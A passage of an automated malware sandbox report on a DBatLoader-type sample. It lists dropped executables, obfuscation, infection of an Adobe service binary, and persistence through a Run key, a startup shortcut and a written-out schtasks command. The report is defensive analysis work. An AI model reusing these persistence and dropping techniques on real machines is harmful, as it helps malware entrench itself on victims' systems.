Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: TrojanAIbot.exe.lnk.10.dr LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: 2jbMIxCFsK.exe Static file information: File size 1392640 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2167425399.000000002BD60000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbH source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002226F000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002223E000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected DBatLoader
Source: Yara match File source: 0.2.2jbMIxCFsK.exe.2e60000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Binary contains a suspicious time stamp
Source: lxsyrsiW.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02E7894C
PE file contains an invalid checksum
Source: Wisrysxl.PIF.6.dr Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: 2jbMIxCFsK.exe Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: neworigin.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x480db
Source: armsvc.exe.8.dr Static PE information: real checksum: 0x32318 should be: 0x14991f
Source: lxsyrsiW.pif.0.dr Static PE information: real checksum: 0x0 should be: 0x1768a
Source: TrojanAIbot.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x42478
Source: server_BTC.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x42478
PE file contains sections with non-standard names
Source: alpha.pif.4.dr Static PE information: section name: .didat
Source: armsvc.exe.8.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8D2FC push 02E8D367h; ret 0_2_02E8D35F
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E663AE push 02E6640Bh; ret 0_2_02E66403
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E663B0 push 02E6640Bh; ret 0_2_02E66403
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8C378 push 02E8C56Eh; ret 0_2_02E8C566
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6C349 push 8B02E6C1h; ret 0_2_02E6C34E
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6332C push eax; ret 0_2_02E63368
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8D0AC push 02E8D125h; ret 0_2_02E8D11D
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7306C push 02E730B9h; ret 0_2_02E730B1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7306B push 02E730B9h; ret 0_2_02E730B1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8D1F8 push 02E8D288h; ret 0_2_02E8D280
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8D144 push 02E8D1ECh; ret 0_2_02E8D1E4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7F108 push ecx; mov dword ptr [esp], edx 0_2_02E7F10D
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E66784 push 02E667C6h; ret 0_2_02E667BE
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E66782 push 02E667C6h; ret 0_2_02E667BE
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6D5A0 push 02E6D5CCh; ret 0_2_02E6D5C4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6C56C push ecx; mov dword ptr [esp], edx 0_2_02E6C571
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8C570 push 02E8C56Eh; ret 0_2_02E8C566
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7AAE0 push 02E7AB18h; ret 0_2_02E7AB10
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78AD8 push 02E78B10h; ret 0_2_02E78B08
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6CA4E push 02E6CD72h; ret 0_2_02E6CD6A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6CBEC push 02E6CD72h; ret 0_2_02E6CD6A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7886C push 02E788AEh; ret 0_2_02E788A6
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02ED4850 push eax; ret 0_2_02ED4920
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E76946 push 02E769F3h; ret 0_2_02E769EB
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E76948 push 02E769F3h; ret 0_2_02E769EB
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7790C push 02E77989h; ret 0_2_02E77981
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E75E7C push ecx; mov dword ptr [esp], edx 0_2_02E75E7E
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E72F60 push 02E72FD6h; ret 0_2_02E72FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009E0C55 push edi; retf 9_2_009E0C7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0306632D push eax; ret 11_2_03066341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_03063A9C push ebx; retf 11_2_03063ADA

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wisrysxl.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe File created: C:\Users\Public\Libraries\lxsyrsiW.pif Jump to dropped file
Drops executable to a common third party application directory
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Users\Public\Libraries\lxsyrsiW.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Drops PE files
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\neworigin.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wisrysxl.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe File created: C:\Users\Public\Libraries\lxsyrsiW.pif Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02E7AB1C
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
